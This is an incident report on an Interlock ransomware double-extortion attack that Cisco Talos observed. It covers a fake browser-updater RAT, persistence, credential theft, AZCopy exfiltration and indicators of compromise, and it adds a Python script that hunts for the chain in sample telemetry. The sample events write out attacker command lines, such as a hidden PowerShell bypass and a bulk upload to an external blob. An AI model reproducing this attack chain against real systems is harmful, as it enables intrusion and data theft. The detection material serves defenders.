Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game hunting and double extortion attacks using the relatively new Interlock ransomware.
# Incident Report: Interlock Ransomware Attack and Double Extortion
## Executive Summary
Cisco Talos Incident Response observed an attacker using the emerging Interlock ransomware in a big-game hunting and double extortion campaign. Initial access came through a fake browser updater that was in fact a Remote Access Tool (RAT); over a dwell time of roughly 17 days the attacker added a credential stealer and a keylogger, moved laterally, and exfiltrated data with Azure Storage Explorer and the AZCopy utility before deploying the Interlock encryptor binary.
## Incident Details
- **Discovery Date:** Not explicitly stated, but analysis was ongoing as of November 7, 2024.
- **Incident Date:** Activity spanned approximately 17 days leading up to ransomware deployment.
- **Affected Organization:** Not explicitly disclosed, but the attacker targets healthcare, technology, U.S. government, and European manufacturing sectors.
- **Sector:** Varied (Healthcare, Technology, Government, Manufacturing).
- **Geography:** U.S. and Europe (based on reported targets).
## Timeline of Events
### Initial Access
- **Date/Time:** Approximately 17 days prior to ransomware deployment.
- **Vector:** A fake Google Chrome browser updater executable (`upd_2327991.exe`) downloaded from a compromised legitimate news website; the file itself was hosted at a URL on a second compromised legitimate site, a retailer.
- **Details:** Running the downloaded executable launched its payload, which was identified as a Remote Access Tool (RAT).
### Execution & Persistence
- On execution the RAT ran an embedded PowerShell script.
- The script downloaded a legitimate Chrome setup executable (`ChromeSetup.exe`) to the temporary folder, most likely as a decoy so that the "update" appeared genuine.
- Persistence was established by dropping a Windows shortcut file (`fahhs.lnk`) in the Windows StartUp folder so the RAT runs at each user login.
- The RAT ran `systeminfo` to collect system details, encrypted the output, and sent it over a TLS socket to the C2 server at `apple-online[.]shop` (fronted by Cloudflare).
- The RAT then downloaded, decrypted (with the hard-coded key `jgSkhg934@kjv#1vkfg2S`) and executed a credential stealer (`cht.exe`) and a keylogger (`klg.dll`, loaded via `rundll32.exe`).
### Lateral Movement
- **Techniques:** Primarily utilized **Remote Desktop Protocol (RDP)**. Additionally observed using AnyDesk and PuTTY.
### Data Exfiltration/Impact
- **Vector:** Attacker used **Azure Storage Explorer**, leveraging the **AZCopy** utility, to exfiltrate victim data to an attacker-controlled Azure storage blob.
- **Impact:** Double extortion confirmed (data encrypted and data stolen).
### Detection & Response
- **Discovery:** Talos Incident Response conducted analysis based on observed TTPs.
- **Response actions taken:** The source describes Talos's analysis of the execution chain; the victim's containment and eradication steps are not detailed.
## Attack Methodology
| Stage | Method/Techniques Used |
| :--- | :--- |
| **Initial Access** | Social engineering via a fake browser updater executable downloaded from a compromised trusted website. |
| **Persistence** | Dropped a Windows shortcut file (`fahhs.lnk`) in the Windows StartUp folder to launch the RAT upon login. |
| **Privilege Escalation** | Not detailed in the source. |
| **Defense Evasion** | EDR was disabled on compromised servers; the exact mechanism (e.g. an EDR uninstaller) is not detailed in the source. |
| **Credential Access** | Deployed a dedicated **credential stealer** (`cht.exe`). |
| **Discovery** | RAT executed `systeminfo` to gather configuration details, memory usage, networking info, and OS builds. |
| **Lateral Movement** | Remote Desktop Protocol (RDP), AnyDesk, and PuTTY used to navigate the network. |
| **Collection** | Deployed a **keylogger** (`klg.dll`) and utilized a **credential stealer**. |
| **Exfiltration** | Used **Azure Storage Explorer** and **AZCopy** utility to upload data to an Azure storage blob. |
| **Impact** | Deployment and execution of the **Interlock ransomware encryptor binary**. |
## Impact Assessment
- **Financial:** Not quantified; big-game hunting targets are chosen for their ability to pay large ransoms, so the demand and recovery costs are expected to be substantial.
- **Data Breach:** Sensitive data was exfiltrated prior to encryption (double extortion).
- **Operational:** Full system encryption following a 17-day dwell time, resulting in significant business disruption.
- **Reputational:** Public exposure of stolen data on the "Worldwide Secrets Blog" data leak site if the victim refuses to pay.
## Indicators of Compromise (Defanged)
- **Network indicators:** C2 domain: `apple-online[.]shop` (Cloudflare protected).
- **File indicators:** RAT (embedded in fake updater), PowerShell scripts, credential stealer (`cht.exe`), keylogger (`klg.dll`), shortcut file (`fahhs.lnk`).
- **Behavioral indicators:** Disabling of EDR, use of `rundll32.exe` to execute DLLs, data exfiltration via AZCopy utility.
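The behavioral indicators above, together with the execution chain in the Timeline section, translate directly into a hunt over endpoint process and file telemetry. The script below is an added example written for this page, not Talos code and not part of the incident analysis. It assumes Sysmon-style JSON lines (process create events with `image`, `parent` and `cmd`; file create events with `"type":"file"` and a `target` path) and flags the stages described in the report: PowerShell and `systeminfo` spawned by a binary in a user-writable path, a `.lnk` written into a Startup folder by such a binary, `rundll32.exe` loading a DLL from a user-writable path, and `azcopy.exe` or an Azure blob URL on a command line. The sample events, host names, user names, storage account and the `klg.dll` entry point are constructed for illustration; only the file names come from the report.

```python
"""Hunt for the Interlock execution chain in process/file telemetry (added example)."""
import json
import re

# Locations an unprivileged user can write to. A binary running from one of these
# is the common thread through every stage of the chain described in the report.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(?:users\\[^\\]+\\(?:downloads|appdata|desktop|documents)"
    r"|programdata|windows\\temp)\\",
    re.I,
)
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)
AZURE_BLOB = re.compile(r"https?://[a-z0-9-]+\.blob\.core\.windows\.net/", re.I)
RUNDLL_ARG = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)', re.I)

# Constructed sample telemetry (not from the incident). Field names mirror Sysmon
# Event ID 1 (process create) and Event ID 11 (file create, marked "type":"file").
# The last two lines are benign look-alikes the rules must not flag.
SAMPLE_EVENTS = r"""
{"host":"WS01","image":"C:\\Users\\jdoe\\Downloads\\upd_2327991.exe","parent":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","cmd":"upd_2327991.exe"}
{"host":"WS01","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Users\\jdoe\\Downloads\\upd_2327991.exe","cmd":"powershell.exe -w hidden -ep bypass -c <script>"}
{"host":"WS01","type":"file","image":"C:\\Users\\jdoe\\Downloads\\upd_2327991.exe","target":"C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fahhs.lnk"}
{"host":"WS01","image":"C:\\Windows\\System32\\systeminfo.exe","parent":"C:\\Users\\jdoe\\Downloads\\upd_2327991.exe","cmd":"systeminfo"}
{"host":"WS01","image":"C:\\Windows\\System32\\rundll32.exe","parent":"C:\\Users\\jdoe\\Downloads\\upd_2327991.exe","cmd":"rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\klg.dll,#1"}
{"host":"SRV02","image":"C:\\Users\\admin\\Downloads\\azcopy.exe","parent":"C:\\Windows\\explorer.exe","cmd":"azcopy.exe copy D:\\Finance https://example.blob.core.windows.net/staging --recursive"}
{"host":"WS01","image":"C:\\Windows\\System32\\rundll32.exe","parent":"C:\\Windows\\explorer.exe","cmd":"rundll32.exe shell32.dll,Control_RunDLL"}
{"host":"WS01","image":"C:\\Windows\\System32\\systeminfo.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmd":"systeminfo"}
"""


def basename(path):
    """Lower-cased final path component, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return the stage tags one event triggers (empty list if nothing matched)."""
    hits = []
    if event.get("type") == "file":
        # Persistence: shortcut written into a Startup folder by a user-path binary.
        if STARTUP_LNK.search(event["target"]) and USER_WRITABLE.search(event["image"]):
            hits.append("persistence:startup-lnk")
        return hits
    name = basename(event["image"])
    parent_user_writable = bool(USER_WRITABLE.search(event.get("parent", "")))
    cmd = event.get("cmd", "")
    if name in ("powershell.exe", "pwsh.exe") and parent_user_writable:
        hits.append("execution:powershell-from-user-path")
    if name == "systeminfo.exe" and parent_user_writable:
        hits.append("discovery:systeminfo-from-user-path")
    if name == "rundll32.exe":
        # Only DLLs loaded from user-writable paths; rundll32 on system DLLs is routine.
        m = RUNDLL_ARG.search(cmd)
        if m and USER_WRITABLE.search(m.group(1)):
            hits.append("collection:rundll32-user-path-dll")
    if name == "azcopy.exe" or AZURE_BLOB.search(cmd):
        hits.append("exfiltration:azcopy-blob-upload")
    return hits


def hunt(jsonl):
    """Group hits per host so a multi-stage chain on one machine stands out."""
    per_host = {}
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        for hit in analyze(event):
            per_host.setdefault(event["host"], []).append(hit)
    return per_host


if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {len(hits)} stage(s) -> {', '.join(hits)}")
```

Grouping per host is the point of `hunt`: any one of these rules fires occasionally on legitimate activity, but a single workstation that shows PowerShell from a Downloads binary, a Startup shortcut, `systeminfo` and a `rundll32` DLL load from `%TEMP%` within a short window is the chain this report describes and should be escalated rather than triaged as four separate low-severity alerts. The `USER_WRITABLE` and `STARTUP_LNK` patterns are written for default English Windows paths; adjust them for redirected profiles or localized folder names.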
## Response Actions
- **Containment:** (Implied) Isolation of affected systems and blocking of C2 communication once detected.
- **Eradication:** Not detailed, but would involve removing the RAT, the StartUp folder shortcut, and all attacker tooling (credential stealer, keylogger, AnyDesk, PuTTY, AZCopy) from every touched host.
- **Recovery:** Rebuilding or restoring encrypted systems, resetting every credential the stealer and keylogger could have captured, and closing the initial-access path, which here was a user running an unverified "updater" rather than an exploited vulnerability.
## Lessons Learned
- The attackers had roughly 17 days of dwell time, during which each stage (fake updater, PowerShell, StartUp persistence, `rundll32` loading a DLL, RDP lateral movement, AZCopy uploads) was an opportunity for detection or threat hunting.
- The delivery chain was multi-stage (Fake Updater -> RAT -> PowerShell -> Credential Theft/Keylogging), so blocking or detecting any single stage would have disrupted it.
- Attackers used a legitimate cloud utility (AZCopy) for exfiltration, which moves large volumes of data while blending in with normal Azure traffic.
- The group (Interlock) shows TTP similarities to Rhysida operators.
## Recommendations
- Implement robust multi-factor authentication (MFA) for RDP access.
- Thoroughly vet and monitor all software update prompts, especially those originating from external sources or unusual download sites.
- Deploy endpoint detection and response (EDR) solutions and ensure administrative controls prevent unauthorized disabling of security tooling.
- Monitor for the unauthorized use of utilities like AZCopy for data staging or exfiltration.
- Patch known vulnerabilities promptly; the Interlock operators claim on their leak site to target organizations with unpatched vulnerabilities.